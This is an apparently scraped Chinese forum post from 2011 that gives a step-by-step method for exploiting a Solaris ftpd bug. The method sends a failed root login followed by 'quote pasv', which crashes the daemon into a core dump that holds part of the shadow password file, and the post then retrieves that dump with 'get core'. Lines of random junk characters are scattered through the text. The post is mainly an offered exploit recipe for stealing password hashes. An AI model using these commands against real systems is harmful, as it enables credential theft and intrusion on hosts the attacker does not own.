该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
7 o, p4 @/ h- F& d* t* f2 G6 U# K% Y& ]
1.通过 ftp 正常登录到目的主机上
2 f z* \) j. E ]" k
( G/ V+ g g' |, C ~2.输入如下命令序列:
3 `, s/ a. K: ~& P4 t+ ?. D0 I
ftp> user root wrongpasswd
" j# [& w1 i9 M2 ]3 V8 _6 }, k( d/ p& k1 r; c
ftp> quote pasv
1 P, { X, Y T5 t! ^- W$ R: L0 b r* M: k# K9 M c5 c8 ]
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
4 J/ t) W$ i) j# S$ U5 s
, ^* b8 E8 `' J! r6 `% u8 u4.再次进入FTP >get core
, R" U" D2 O* K4 ?1 o2 d: T) s7 W- h$ u
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了* j( U& x0 L" [. M1 S3 _6 b8 ?: d
4 ^# [2 ?9 C V/ W
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡